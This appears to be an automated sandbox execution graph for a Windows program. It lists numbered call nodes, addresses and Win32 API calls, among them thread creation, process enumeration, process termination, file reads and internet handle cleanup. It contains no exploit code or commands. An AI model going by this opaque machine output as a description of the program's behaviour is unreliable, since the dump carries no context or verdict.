                                                                                              execution_graph 97720 636981 97727 63373a 97720->97727 97722 636997 97736 637b3f 97722->97736 97724 6369bf 97725 63584d 97724->97725 97748 69a48d 89 API calls 4 library calls 97724->97748 97728 633746 97727->97728 97729 633758 97727->97729 97749 63523c 59 API calls 97728->97749 97731 633787 97729->97731 97732 63375e 97729->97732 97760 63523c 59 API calls 97731->97760 97750 650fe6 97732->97750 97735 633750 97735->97722 97795 64162d 97736->97795 97738 637b64 _wcscmp 97742 637b98 Mailbox 97738->97742 97800 641a36 97738->97800 97742->97724 97743 66ffb8 97805 633938 68 API calls 97743->97805 97745 66ffc9 97747 66ffcd Mailbox 97745->97747 97806 63523c 59 API calls 97745->97806 97747->97724 97748->97725 97749->97735 97754 650fee 97750->97754 97752 651008 97752->97735 97754->97752 97755 65100c std::exception::exception 97754->97755 97761 65593c 97754->97761 97778 6535d1 DecodePointer 97754->97778 97779 6587cb RaiseException 97755->97779 97757 651036 97780 658701 58 API calls _free 97757->97780 97759 651048 97759->97735 97760->97735 97762 6559b7 97761->97762 97766 655948 97761->97766 97789 6535d1 DecodePointer 97762->97789 97764 6559bd 97790 658d58 58 API calls __getptd_noexit 97764->97790 97768 655953 97766->97768 97769 65597b RtlAllocateHeap 97766->97769 97772 6559a3 97766->97772 97776 6559a1 97766->97776 97786 6535d1 DecodePointer 97766->97786 97768->97766 97781 65a39b 58 API calls __NMSG_WRITE 97768->97781 97782 65a3f8 58 API calls 5 library calls 97768->97782 97783 6532cf 97768->97783 97769->97766 97770 6559af 97769->97770 97770->97754 97787 658d58 58 API calls __getptd_noexit 97772->97787 97788 658d58 58 API calls __getptd_noexit 97776->97788 97778->97754 97779->97757 97780->97759 97781->97768 97782->97768 97791 65329b GetModuleHandleExW 97783->97791 97786->97766 97787->97776 97788->97770 97789->97764 97790->97770 97792 6532b4 GetProcAddress 97791->97792 97793 6532cb ExitProcess 97791->97793 97792->97793 97794 6532c6 97792->97794 97794->97793 97796 650fe6 Mailbox 59 API calls 97795->97796 97797 641652 97796->97797 97798 650fe6 Mailbox 59 API calls 97797->97798 97799 641660 97798->97799 97799->97738 97801 641a45 __NMSG_WRITE _memmove 97800->97801 97802 650fe6 Mailbox 59 API calls 97801->97802 97803 641a83 97802->97803 97804 6417e0 59 API calls Mailbox 97803->97804 97804->97743 97805->97745 97806->97747 97807 631066 97812 63aaaa 97807->97812 97809 63106c 97844 652f70 97809->97844 97813 63aacb 97812->97813 97847 6502eb 97813->97847 97817 63ab12 97857 641207 97817->97857 97820 641207 59 API calls 97821 63ab26 97820->97821 97822 641207 59 API calls 97821->97822 97823 63ab30 97822->97823 97824 641207 59 API calls 97823->97824 97825 63ab6e 97824->97825 97826 641207 59 API calls 97825->97826 97827 63ac39 97826->97827 97862 650588 97827->97862 97831 63ac6b 97832 641207 59 API calls 97831->97832 97833 63ac75 97832->97833 97890 64fe2b 97833->97890 97835 63acbc 97836 63accc GetStdHandle 97835->97836 97837 63ad18 97836->97837 97838 672f39 97836->97838 97839 63ad20 OleInitialize 97837->97839 97838->97837 97897 6970f3 97838->97897 97839->97809 97841 672f49 97903 6977c2 97841->97903 97958 652e74 97844->97958 97846 631076 97906 6503c4 97847->97906 97850 6503c4 59 API calls 97851 65032d 97850->97851 97852 641207 59 API calls 97851->97852 97853 650339 97852->97853 97913 641821 97853->97913 97855 63aad1 97856 6507bb 6 API calls 97855->97856 97856->97817 97858 650fe6 Mailbox 59 API calls 97857->97858 97859 641228 97858->97859 97860 650fe6 Mailbox 59 API calls 97859->97860 97861 63ab1c 97860->97861 97861->97820 97863 641207 59 API calls 97862->97863 97864 650598 97863->97864 97865 641207 59 API calls 97864->97865 97866 6505a0 97865->97866 97932 6410c3 97866->97932 97869 6410c3 59 API calls 97870 6505b0 97869->97870 97871 641207 59 API calls 97870->97871 97872 6505bb 97871->97872 97873 650fe6 Mailbox 59 API calls 97872->97873 97874 63ac43 97873->97874 97875 64ff4c 97874->97875 97876 64ff5a 97875->97876 97877 641207 59 API calls 97876->97877 97878 64ff65 97877->97878 97879 641207 59 API calls 97878->97879 97880 64ff70 97879->97880 97881 641207 59 API calls 97880->97881 97882 64ff7b 97881->97882 97883 641207 59 API calls 97882->97883 97884 64ff86 97883->97884 97885 6410c3 59 API calls 97884->97885 97886 64ff91 97885->97886 97887 650fe6 Mailbox 59 API calls 97886->97887 97888 64ff98 RegisterWindowMessageW 97887->97888 97888->97831 97891 68620c 97890->97891 97892 64fe3b 97890->97892 97935 69a12a 59 API calls 97891->97935 97893 650fe6 Mailbox 59 API calls 97892->97893 97896 64fe43 97893->97896 97895 686217 97896->97835 97898 650fe6 Mailbox 59 API calls 97897->97898 97899 6970fd 97898->97899 97900 69710c 97899->97900 97936 696fda InitializeCriticalSectionAndSpinCount 97899->97936 97900->97841 97902 69710a 97902->97841 97904 6977d0 CreateThread 97903->97904 97905 672f55 CloseHandle 97903->97905 97904->97905 97942 6977a8 97904->97942 97905->97839 97907 641207 59 API calls 97906->97907 97908 6503cf 97907->97908 97909 641207 59 API calls 97908->97909 97910 6503d7 97909->97910 97911 641207 59 API calls 97910->97911 97912 650323 97911->97912 97912->97850 97914 64182d __NMSG_WRITE 97913->97914 97915 64189a 97913->97915 97917 641843 97914->97917 97918 641868 97914->97918 97924 641981 97915->97924 97922 641b7c 59 API calls Mailbox 97917->97922 97923 641c7e 59 API calls Mailbox 97918->97923 97921 64184b _memmove 97921->97855 97922->97921 97923->97921 97925 64198f 97924->97925 97927 641998 _memmove 97924->97927 97925->97927 97928 641aa4 97925->97928 97927->97921 97929 641ab7 97928->97929 97931 641ab4 _memmove 97928->97931 97930 650fe6 Mailbox 59 API calls 97929->97930 97930->97931 97931->97927 97933 641207 59 API calls 97932->97933 97934 6410cb 97933->97934 97934->97869 97935->97895 97939 697221 97936->97939 97940 697016 InterlockedExchange 97939->97940 97941 69722f GetCurrentProcess GetCurrentProcess DuplicateHandle 97939->97941 97940->97902 97941->97940 97943 6977b7 97942->97943 97944 6977b2 97942->97944 97946 697681 InterlockedExchange 97944->97946 97947 650fe6 Mailbox 59 API calls 97946->97947 97948 6976a8 97947->97948 97949 650fe6 Mailbox 59 API calls 97948->97949 97950 6976bb ReadFile 97949->97950 97951 697788 97950->97951 97952 6976dd 97950->97952 97954 697791 InterlockedExchange 97951->97954 97952->97951 97953 6976e7 EnterCriticalSection 97952->97953 97956 69770f _memmove 97952->97956 97953->97952 97953->97956 97954->97943 97955 69775b LeaveCriticalSection ReadFile 97955->97951 97955->97952 97956->97955 97957 650fe6 Mailbox 59 API calls 97956->97957 97957->97956 97959 652e80 __fcloseall 97958->97959 97966 653447 97959->97966 97965 652ea7 __fcloseall 97965->97846 97983 659e3b 97966->97983 97968 652e89 97969 652eb8 DecodePointer DecodePointer 97968->97969 97970 652ee5 97969->97970 97971 652e95 97969->97971 97970->97971 98028 6589d4 59 API calls __gmtime64_s 97970->98028 97980 652eb2 97971->97980 97973 652f48 EncodePointer EncodePointer 97973->97971 97974 652ef7 97974->97973 97975 652f1c 97974->97975 98029 658a94 61 API calls 2 library calls 97974->98029 97975->97971 97978 652f36 EncodePointer 97975->97978 98030 658a94 61 API calls 2 library calls 97975->98030 97978->97973 97979 652f30 97979->97971 97979->97978 98031 653450 97980->98031 97984 659e4c 97983->97984 97985 659e5f EnterCriticalSection 97983->97985 97990 659ec3 97984->97990 97985->97968 97987 659e52 97987->97985 98014 6532e5 58 API calls 3 library calls 97987->98014 97991 659ecf __fcloseall 97990->97991 97992 659ef0 97991->97992 97993 659ed8 97991->97993 98001 659f11 __fcloseall 97992->98001 98017 658a4d 58 API calls 2 library calls 97992->98017 98015 65a39b 58 API calls __NMSG_WRITE 97993->98015 97996 659edd 98016 65a3f8 58 API calls 5 library calls 97996->98016 97997 659f05 97999 659f0c 97997->97999 98000 659f1b 97997->98000 98018 658d58 58 API calls __getptd_noexit 97999->98018 98005 659e3b __lock 58 API calls 98000->98005 98001->97987 98002 659ee4 98003 6532cf __mtinitlocknum 3 API calls 98002->98003 98006 659eee 98003->98006 98007 659f22 98005->98007 98006->97992 98008 659f47 98007->98008 98009 659f2f 98007->98009 98020 652f85 98008->98020 98019 65a05b InitializeCriticalSectionAndSpinCount 98009->98019 98012 659f3b 98026 659f63 LeaveCriticalSection _doexit 98012->98026 98015->97996 98016->98002 98017->97997 98018->98001 98019->98012 98021 652f8e RtlFreeHeap 98020->98021 98022 652fb7 __dosmaperr 98020->98022 98021->98022 98023 652fa3 98021->98023 98022->98012 98027 658d58 58 API calls __getptd_noexit 98023->98027 98025 652fa9 GetLastError 98025->98022 98026->98001 98027->98025 98028->97974 98029->97975 98030->97979 98034 659fa5 LeaveCriticalSection 98031->98034 98033 652eb7 98033->97965 98034->98033 98035 66e463 98036 63373a 59 API calls 98035->98036 98037 66e479 98036->98037 98038 66e48f 98037->98038 98039 66e4fa 98037->98039 98089 635376 60 API calls 98038->98089 98047 63b020 98039->98047 98042 66e4ce 98046 66e4ee Mailbox 98042->98046 98090 69890a 59 API calls Mailbox 98042->98090 98044 66f046 Mailbox 98046->98044 98091 69a48d 89 API calls 4 library calls 98046->98091 98092 643740 98047->98092 98050 6730b6 98181 69a48d 89 API calls 4 library calls 98050->98181 98051 63b07f 98051->98050 98053 6730d4 98051->98053 98065 63b132 Mailbox _memmove 98051->98065 98084 63bb86 98051->98084 98182 69a48d 89 API calls 4 library calls 98053->98182 98055 67355e 98088 63b4dd 98055->98088 98240 69a48d 89 API calls 4 library calls 98055->98240 98056 673106 98057 67318a 98056->98057 98183 63a9de 266 API calls 98056->98183 98057->98088 98184 69a48d 89 API calls 4 library calls 98057->98184 98059 68730a 59 API calls 98059->98065 98065->98055 98065->98056 98065->98059 98066 6353b0 266 API calls 98065->98066 98067 633b31 59 API calls 98065->98067 98070 673418 98065->98070 98076 6731c3 98065->98076 98077 633c30 68 API calls 98065->98077 98080 67346f 98065->98080 98083 650fe6 59 API calls Mailbox 98065->98083 98065->98084 98085 63523c 59 API calls 98065->98085 98086 641c9c 59 API calls 98065->98086 98065->98088 98097 633add 98065->98097 98104 63bc70 98065->98104 98178 633a40 59 API calls Mailbox 98065->98178 98179 635190 59 API calls Mailbox 98065->98179 98186 686c62 59 API calls 2 library calls 98065->98186 98187 6aa9c3 85 API calls Mailbox 98065->98187 98188 686c1e 59 API calls Mailbox 98065->98188 98189 695ef2 68 API calls 98065->98189 98190 633ea3 98065->98190 98239 69a12a 59 API calls 98065->98239 98066->98065 98067->98065 98206 6353b0 98070->98206 98073 673448 98073->98088 98234 6339be 98073->98234 98185 69a48d 89 API calls 4 library calls 98076->98185 98077->98065 98238 69a48d 89 API calls 4 library calls 98080->98238 98083->98065 98180 69a48d 89 API calls 4 library calls 98084->98180 98085->98065 98086->98065 98088->98046 98089->98042 98090->98046 98091->98044 98093 64374f 98092->98093 98096 64376a 98092->98096 98094 641aa4 59 API calls 98093->98094 98095 643757 CharUpperBuffW 98094->98095 98095->98096 98096->98051 98098 66d3cd 98097->98098 98099 633aee 98097->98099 98100 650fe6 Mailbox 59 API calls 98099->98100 98101 633af5 98100->98101 98102 633b16 98101->98102 98241 633ba5 59 API calls Mailbox 98101->98241 98102->98065 98105 67359f 98104->98105 98115 63bc95 98104->98115 98327 69a48d 89 API calls 4 library calls 98105->98327 98107 63bf3b 98107->98065 98114 63c2ca LockWindowUpdate DestroyWindow GetMessageW 98114->98107 98116 63c2fc 98114->98116 98169 63bca5 Mailbox 98115->98169 98328 635376 60 API calls 98115->98328 98329 68700c 266 API calls 98115->98329 98118 674509 TranslateMessage DispatchMessageW GetMessageW 98116->98118 98117 6736b3 Sleep 98117->98169 98118->98107 98118->98118 98119 635376 60 API calls 98119->98169 98120 63bf54 timeGetTime 98120->98169 98122 67405d WaitForSingleObject 98123 67407d GetExitCodeProcess CloseHandle 98122->98123 98122->98169 98134 63c36b 98123->98134 98125 641207 59 API calls 98155 63c1fa Mailbox 98125->98155 98126 63c210 Sleep 98126->98155 98127 6743a9 Sleep 98127->98155 98128 650fe6 59 API calls Mailbox 98128->98169 98130 636cd8 244 API calls 98130->98169 98132 63c324 timeGetTime 98326 635376 60 API calls 98132->98326 98133 650859 timeGetTime 98133->98155 98134->98065 98138 674440 GetExitCodeProcess 98139 674456 WaitForSingleObject 98138->98139 98140 67446c CloseHandle 98138->98140 98139->98140 98139->98169 98140->98155 98141 6b6562 110 API calls 98141->98155 98143 636d79 109 API calls 98143->98169 98145 6738aa Sleep 98145->98169 98146 6744c8 Sleep 98146->98169 98149 641a36 59 API calls 98149->98155 98152 633ea3 68 API calls 98152->98155 98154 63c26d 98158 641a36 59 API calls 98154->98158 98155->98125 98155->98126 98155->98133 98155->98134 98155->98138 98155->98141 98155->98145 98155->98146 98155->98149 98155->98152 98155->98169 98358 692baf 60 API calls 98155->98358 98359 635376 60 API calls 98155->98359 98360 636cd8 266 API calls 98155->98360 98401 6870e2 59 API calls 98155->98401 98402 6957ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98155->98402 98403 694148 CreateToolhelp32Snapshot Process32FirstW 98155->98403 98156 63b020 244 API calls 98156->98169 98160 63bf25 Mailbox 98158->98160 98160->98107 98309 63c460 98160->98309 98161 641a36 59 API calls 98161->98169 98164 6353b0 244 API calls 98164->98169 98165 686cf1 59 API calls Mailbox 98165->98169 98166 6339be 68 API calls 98166->98169 98168 69a48d 89 API calls 98168->98169 98169->98117 98169->98119 98169->98120 98169->98122 98169->98126 98169->98127 98169->98128 98169->98130 98169->98132 98169->98134 98169->98143 98169->98154 98169->98155 98169->98156 98169->98160 98169->98161 98169->98164 98169->98165 98169->98166 98169->98168 98170 633ea3 68 API calls 98169->98170 98171 673e13 VariantClear 98169->98171 98172 673ea9 VariantClear 98169->98172 98173 6341c4 59 API calls Mailbox 98169->98173 98174 673c57 VariantClear 98169->98174 98175 687aad 59 API calls 98169->98175 98176 635190 59 API calls Mailbox 98169->98176 98242 6352b0 98169->98242 98251 639a00 98169->98251 98258 639c80 98169->98258 98289 63a820 98169->98289 98306 6ae60c 98169->98306 98330 641c9c 98169->98330 98334 6b6655 59 API calls 98169->98334 98335 69a058 59 API calls Mailbox 98169->98335 98336 68e0aa 59 API calls 98169->98336 98337 634d37 98169->98337 98355 686c62 59 API calls 2 library calls 98169->98355 98356 6338ff 59 API calls 98169->98356 98357 633a40 59 API calls Mailbox 98169->98357 98361 6ac355 98169->98361 98170->98169 98171->98169 98172->98169 98173->98169 98174->98169 98175->98169 98176->98169 98178->98065 98179->98065 98180->98050 98181->98088 98182->98088 98183->98057 98184->98088 98185->98088 98186->98065 98187->98065 98188->98065 98189->98065 98667 633c30 98190->98667 98192 633eb3 98193 633f2d 98192->98193 98194 633ebd 98192->98194 98676 63523c 59 API calls 98193->98676 98195 650fe6 Mailbox 59 API calls 98194->98195 98197 633ece 98195->98197 98198 633edc 98197->98198 98199 641207 59 API calls 98197->98199 98200 633eeb 98198->98200 98674 641bcc 59 API calls 2 library calls 98198->98674 98199->98198 98201 650fe6 Mailbox 59 API calls 98200->98201 98203 633ef5 98201->98203 98675 633bc8 68 API calls 98203->98675 98205 633f1d 98205->98065 98207 6353cf 98206->98207 98229 6353fd Mailbox 98206->98229 98208 650fe6 Mailbox 59 API calls 98207->98208 98208->98229 98209 652f70 67 API calls __cinit 98209->98229 98210 6369fa 98211 641c9c 59 API calls 98210->98211 98230 635569 Mailbox 98211->98230 98212 6369ff 98214 66f165 98212->98214 98215 66e691 98212->98215 98213 650fe6 59 API calls Mailbox 98213->98229 98683 69a48d 89 API calls 4 library calls 98214->98683 98679 69a48d 89 API calls 4 library calls 98215->98679 98216 641207 59 API calls 98216->98229 98220 66e6a0 98220->98073 98221 66ea9a 98223 641c9c 59 API calls 98221->98223 98223->98230 98224 641c9c 59 API calls 98224->98229 98226 687aad 59 API calls 98226->98229 98227 66eb67 98227->98230 98680 687aad 59 API calls 98227->98680 98229->98209 98229->98210 98229->98212 98229->98213 98229->98215 98229->98216 98229->98221 98229->98224 98229->98226 98229->98227 98229->98230 98231 66ef28 98229->98231 98233 635a1a 98229->98233 98677 637e50 266 API calls 2 library calls 98229->98677 98678 636e30 60 API calls Mailbox 98229->98678 98230->98073 98681 69a48d 89 API calls 4 library calls 98231->98681 98682 69a48d 89 API calls 4 library calls 98233->98682 98235 6339c9 98234->98235 98236 633ea3 68 API calls 98235->98236 98237 6339f0 98235->98237 98236->98237 98237->98080 98238->98088 98239->98065 98240->98088 98241->98102 98243 6352c6 98242->98243 98244 635313 98242->98244 98243->98244 98245 6352d3 PeekMessageW 98243->98245 98246 6352ec 98244->98246 98248 66df68 TranslateAcceleratorW 98244->98248 98249 635352 TranslateMessage DispatchMessageW 98244->98249 98250 63533e PeekMessageW 98244->98250 98413 63359e 98244->98413 98245->98244 98245->98246 98246->98169 98248->98244 98248->98250 98249->98250 98250->98244 98250->98246 98252 639a31 98251->98252 98253 639a1d 98251->98253 98452 69a48d 89 API calls 4 library calls 98252->98452 98418 6394e0 98253->98418 98255 639a28 98255->98169 98257 672478 98257->98257 98259 639cb5 98258->98259 98260 67247d 98259->98260 98262 639d1f 98259->98262 98272 639d79 98259->98272 98261 6353b0 266 API calls 98260->98261 98263 672492 98261->98263 98265 641207 59 API calls 98262->98265 98262->98272 98276 639f50 Mailbox 98263->98276 98462 69a48d 89 API calls 4 library calls 98263->98462 98264 641207 59 API calls 98264->98272 98267 6724d8 98265->98267 98269 652f70 __cinit 67 API calls 98267->98269 98268 652f70 __cinit 67 API calls 98268->98272 98269->98272 98270 6724fa 98270->98169 98271 6339be 68 API calls 98271->98276 98272->98264 98272->98268 98272->98270 98275 639f3a 98272->98275 98272->98276 98274 63a775 98467 69a48d 89 API calls 4 library calls 98274->98467 98275->98276 98463 69a48d 89 API calls 4 library calls 98275->98463 98276->98271 98276->98274 98277 634230 59 API calls 98276->98277 98278 6353b0 266 API calls 98276->98278 98286 69a48d 89 API calls 98276->98286 98288 63a058 98276->98288 98461 641bcc 59 API calls 2 library calls 98276->98461 98464 687aad 59 API calls 98276->98464 98465 6accac 266 API calls 98276->98465 98466 6abc26 266 API calls Mailbox 98276->98466 98468 635190 59 API calls Mailbox 98276->98468 98469 6a9ab0 266 API calls Mailbox 98276->98469 98277->98276 98278->98276 98282 6727f9 98282->98169 98286->98276 98288->98169 98290 672d51 98289->98290 98293 63a84c 98289->98293 98471 69a48d 89 API calls 4 library calls 98290->98471 98292 672d62 98292->98169 98294 672d6a 98293->98294 98301 63a888 _memmove 98293->98301 98472 69a48d 89 API calls 4 library calls 98294->98472 98297 650fe6 59 API calls Mailbox 98297->98301 98298 672dae 98473 63a9de 266 API calls 98298->98473 98299 6353b0 266 API calls 98299->98301 98301->98297 98301->98298 98301->98299 98302 672dc8 98301->98302 98303 63a975 98301->98303 98304 63a962 98301->98304 98302->98303 98474 69a48d 89 API calls 4 library calls 98302->98474 98303->98169 98304->98303 98470 6aa9c3 85 API calls Mailbox 98304->98470 98475 6ad1c6 98306->98475 98308 6ae61c 98308->98169 98588 6502d4 98309->98588 98311 63c2b6 98311->98107 98314 63c483 98311->98314 98312 63c46d 98312->98311 98313 6977eb 7 API calls Mailbox 98312->98313 98313->98312 98315 641a36 59 API calls 98314->98315 98316 63c4ad 98315->98316 98317 633ea3 68 API calls 98316->98317 98318 63c4c2 Mailbox 98317->98318 98319 641a36 59 API calls 98318->98319 98320 63c4ef 98319->98320 98321 633ea3 68 API calls 98320->98321 98324 63c500 Mailbox 98321->98324 98322 63c524 98322->98114 98324->98322 98593 635376 60 API calls 98324->98593 98594 68700c 266 API calls 98324->98594 98326->98169 98327->98115 98328->98115 98329->98115 98331 641ca7 98330->98331 98332 641caf 98330->98332 98595 641bcc 59 API calls 2 library calls 98331->98595 98332->98169 98334->98169 98335->98169 98336->98169 98338 634d51 98337->98338 98347 634d4b 98337->98347 98339 634d99 98338->98339 98340 66db28 __i64tow 98338->98340 98342 634d57 __itow 98338->98342 98343 66da2f 98338->98343 98596 6538c8 83 API calls 3 library calls 98339->98596 98340->98340 98345 650fe6 Mailbox 59 API calls 98342->98345 98348 650fe6 Mailbox 59 API calls 98343->98348 98353 66daa7 Mailbox _wcscpy 98343->98353 98346 634d71 98345->98346 98346->98347 98349 641a36 59 API calls 98346->98349 98347->98169 98350 66da74 98348->98350 98349->98347 98351 650fe6 Mailbox 59 API calls 98350->98351 98352 66da9a 98351->98352 98352->98353 98354 641a36 59 API calls 98352->98354 98597 6538c8 83 API calls 3 library calls 98353->98597 98354->98353 98355->98169 98356->98169 98357->98169 98358->98155 98359->98155 98360->98155 98362 6ac39a 98361->98362 98363 6ac380 98361->98363 98598 6aa8fd 98362->98598 98625 69a48d 89 API calls 4 library calls 98363->98625 98367 6353b0 265 API calls 98368 6ac406 98367->98368 98369 6ac498 98368->98369 98373 6ac447 98368->98373 98394 6ac392 Mailbox 98368->98394 98370 6ac4ee 98369->98370 98371 6ac49e 98369->98371 98372 634d37 84 API calls 98370->98372 98370->98394 98626 697ed5 59 API calls 98371->98626 98374 6ac500 98372->98374 98378 69789a 59 API calls 98373->98378 98376 641aa4 59 API calls 98374->98376 98379 6ac524 CharUpperBuffW 98376->98379 98377 6ac4c1 98627 6435b9 59 API calls Mailbox 98377->98627 98381 6ac477 98378->98381 98384 6ac53e 98379->98384 98382 686ebc 265 API calls 98381->98382 98382->98394 98383 6ac4c9 Mailbox 98388 63b020 265 API calls 98383->98388 98385 6ac591 98384->98385 98386 6ac545 98384->98386 98387 634d37 84 API calls 98385->98387 98605 69789a 98386->98605 98389 6ac599 98387->98389 98388->98394 98628 635376 60 API calls 98389->98628 98394->98169 98395 6ac5a3 98395->98394 98396 634d37 84 API calls 98395->98396 98397 6ac5be 98396->98397 98629 6435b9 59 API calls Mailbox 98397->98629 98399 6ac5ce 98400 63b020 265 API calls 98399->98400 98400->98394 98401->98155 98402->98155 98656 694ce2 98403->98656 98405 694195 Process32NextW 98406 694244 CloseHandle 98405->98406 98408 69418e Mailbox 98405->98408 98406->98155 98407 641207 59 API calls 98407->98408 98408->98405 98408->98406 98408->98407 98409 641a36 59 API calls 98408->98409 98662 650119 59 API calls Mailbox 98408->98662 98663 6417e0 59 API calls Mailbox 98408->98663 98664 64151f 61 API calls 98408->98664 98409->98408 98414 6335e2 98413->98414 98416 6335b0 98413->98416 98414->98244 98415 6335d5 IsDialogMessageW 98415->98414 98415->98416 98416->98414 98416->98415 98417 66d273 GetClassLongW 98416->98417 98417->98415 98417->98416 98419 6353b0 266 API calls 98418->98419 98420 63951f 98419->98420 98421 672001 98420->98421 98435 639527 _memmove 98420->98435 98454 635190 59 API calls Mailbox 98421->98454 98423 6722c0 98460 69a48d 89 API calls 4 library calls 98423->98460 98425 6722de 98425->98425 98426 639583 98426->98255 98427 639944 98431 650fe6 Mailbox 59 API calls 98427->98431 98428 63986a 98429 6722b1 98428->98429 98430 63987f 98428->98430 98459 6aa983 59 API calls 98429->98459 98433 650fe6 Mailbox 59 API calls 98430->98433 98445 6396e3 _memmove 98431->98445 98432 650fe6 59 API calls Mailbox 98432->98435 98446 63977d 98433->98446 98435->98423 98435->98426 98435->98427 98435->98432 98436 6396cf 98435->98436 98439 639741 98435->98439 98436->98427 98438 6396dc 98436->98438 98437 650fe6 Mailbox 59 API calls 98442 63970e 98437->98442 98441 650fe6 Mailbox 59 API calls 98438->98441 98439->98428 98440 6722a0 98439->98440 98439->98446 98448 672278 98439->98448 98450 672253 98439->98450 98455 638180 266 API calls 98439->98455 98458 69a48d 89 API calls 4 library calls 98440->98458 98441->98445 98442->98439 98453 63cca0 266 API calls 98442->98453 98445->98437 98445->98439 98445->98442 98446->98255 98457 69a48d 89 API calls 4 library calls 98448->98457 98456 69a48d 89 API calls 4 library calls 98450->98456 98452->98257 98453->98439 98454->98427 98455->98439 98456->98446 98457->98446 98458->98446 98459->98423 98460->98425 98461->98276 98462->98276 98463->98276 98464->98276 98465->98276 98466->98276 98467->98282 98468->98276 98469->98276 98470->98303 98471->98292 98472->98303 98473->98302 98474->98303 98476 634d37 84 API calls 98475->98476 98477 6ad203 98476->98477 98482 6ad24a Mailbox 98477->98482 98513 6ade8e 98477->98513 98479 6ad617 98564 6adfb1 92 API calls Mailbox 98479->98564 98482->98308 98483 6ad29b Mailbox 98483->98482 98486 634d37 84 API calls 98483->98486 98500 6ad4a2 98483->98500 98546 69fc0d 59 API calls 2 library calls 98483->98546 98547 6ad6c8 61 API calls 2 library calls 98483->98547 98484 6ad626 98485 6ad4b0 98484->98485 98487 6ad632 98484->98487 98526 6ad057 98485->98526 98486->98483 98487->98482 98492 6ad4e9 98541 650e38 98492->98541 98495 6ad51c 98549 6347be 98495->98549 98496 6ad503 98548 69a48d 89 API calls 4 library calls 98496->98548 98499 6ad50e GetCurrentProcess TerminateProcess 98499->98495 98500->98479 98500->98485 98505 6ad68d 98505->98482 98509 6ad6a1 FreeLibrary 98505->98509 98506 6ad554 98561 6add32 107 API calls _free 98506->98561 98509->98482 98512 6ad565 98512->98505 98562 634230 59 API calls Mailbox 98512->98562 98563 63523c 59 API calls 98512->98563 98565 6add32 107 API calls _free 98512->98565 98514 641aa4 59 API calls 98513->98514 98515 6adea9 CharLowerBuffW 98514->98515 98566 68f903 98515->98566 98519 641207 59 API calls 98520 6adee2 98519->98520 98573 641462 59 API calls 2 library calls 98520->98573 98522 6adef9 98523 641981 59 API calls 98522->98523 98525 6adf05 Mailbox 98523->98525 98524 6adf41 Mailbox 98524->98483 98525->98524 98574 6ad6c8 61 API calls 2 library calls 98525->98574 98527 6ad072 98526->98527 98531 6ad0c7 98526->98531 98528 650fe6 Mailbox 59 API calls 98527->98528 98529 6ad094 98528->98529 98530 650fe6 Mailbox 59 API calls 98529->98530 98529->98531 98530->98529 98532 6ae139 98531->98532 98533 6ae362 Mailbox 98532->98533 98537 6ae15c _strcat _wcscpy __NMSG_WRITE 98532->98537 98533->98492 98534 6350d5 59 API calls 98534->98537 98535 63502b 59 API calls 98535->98537 98536 635087 59 API calls 98536->98537 98537->98533 98537->98534 98537->98535 98537->98536 98538 634d37 84 API calls 98537->98538 98539 65593c 58 API calls __crtGetStringTypeA_stat 98537->98539 98577 695e42 61 API calls 2 library calls 98537->98577 98538->98537 98539->98537 98542 650e4d 98541->98542 98543 650ee5 CreateToolhelp32Snapshot 98542->98543 98544 650eb3 98542->98544 98545 650ed3 CloseHandle 98542->98545 98543->98544 98544->98495 98544->98496 98545->98544 98546->98483 98547->98483 98548->98499 98550 6347c6 98549->98550 98551 650fe6 Mailbox 59 API calls 98550->98551 98552 6347d4 98551->98552 98554 6347e0 98552->98554 98578 6346ec 59 API calls Mailbox 98552->98578 98555 634540 98554->98555 98579 634650 98555->98579 98557 63454f 98558 650fe6 Mailbox 59 API calls 98557->98558 98559 6345eb 98557->98559 98558->98559 98559->98512 98560 634230 59 API calls Mailbox 98559->98560 98560->98506 98561->98512 98562->98512 98563->98512 98564->98484 98565->98512 98567 68f92e __NMSG_WRITE 98566->98567 98568 68f96d 98567->98568 98571 68f963 98567->98571 98572 68fa14 98567->98572 98568->98519 98568->98525 98571->98568 98575 6414db 61 API calls 98571->98575 98572->98568 98576 6414db 61 API calls 98572->98576 98573->98522 98574->98524 98575->98571 98576->98572 98577->98537 98578->98554 98580 634659 Mailbox 98579->98580 98581 66d6ec 98580->98581 98586 634663 98580->98586 98582 650fe6 Mailbox 59 API calls 98581->98582 98583 66d6f8 98582->98583 98583->98583 98584 63466a 98584->98557 98586->98584 98587 635190 59 API calls Mailbox 98586->98587 98587->98586 98591 6502df 98588->98591 98589 6502e7 98589->98312 98591->98589 98592 6a2db2 InternetCloseHandle InternetCloseHandle WaitForSingleObject 98591->98592 98592->98591 98593->98324 98594->98324 98595->98332 98596->98342 98597->98340 98599 6aa918 98598->98599 98604 6aa970 98598->98604 98600 650fe6 Mailbox 59 API calls 98599->98600 98603 6aa93a 98600->98603 98601 650fe6 Mailbox 59 API calls 98601->98603 98603->98601 98603->98604 98630 68715b 59 API calls Mailbox 98603->98630 98604->98367 98606 6978ac 98605->98606 98607 6978e3 98605->98607 98606->98607 98608 650fe6 Mailbox 59 API calls 98606->98608 98609 686ebc 98607->98609 98608->98607 98610 686f06 98609->98610 98615 686f1c Mailbox 98609->98615 98613 641a36 59 API calls 98610->98613 98611 686f5a 98616 63a820 266 API calls 98611->98616 98612 686f47 98614 6ac355 266 API calls 98612->98614 98613->98615 98624 686f53 98614->98624 98615->98611 98615->98612 98620 686f91 98616->98620 98618 687002 98618->98394 98619 686fdc 98619->98624 98636 69a48d 89 API calls 4 library calls 98619->98636 98620->98619 98622 686fc1 98620->98622 98620->98624 98631 68706d 98622->98631 98637 686cf1 59 API calls Mailbox 98624->98637 98625->98394 98626->98377 98627->98383 98628->98395 98629->98399 98630->98603 98632 687085 98631->98632 98638 6af1b2 98632->98638 98643 6a495b 98632->98643 98633 6870d9 98633->98624 98636->98624 98637->98618 98639 634d37 84 API calls 98638->98639 98640 6af1cf 98639->98640 98641 694148 66 API calls 98640->98641 98642 6af1de 98641->98642 98642->98633 98644 650fe6 Mailbox 59 API calls 98643->98644 98645 6a496c 98644->98645 98652 64433f 98645->98652 98648 634d37 84 API calls 98649 6a498d GetEnvironmentVariableW 98648->98649 98655 697a51 59 API calls Mailbox 98649->98655 98651 6a49aa 98651->98633 98653 650fe6 Mailbox 59 API calls 98652->98653 98654 644351 98653->98654 98654->98648 98655->98651 98657 694d09 98656->98657 98661 694cf0 98656->98661 98666 6537c3 59 API calls __wcstoi64 98657->98666 98660 694d0f 98660->98408 98661->98657 98661->98660 98665 65385c GetStringTypeW _iswctype 98661->98665 98662->98408 98663->98408 98664->98408 98665->98661 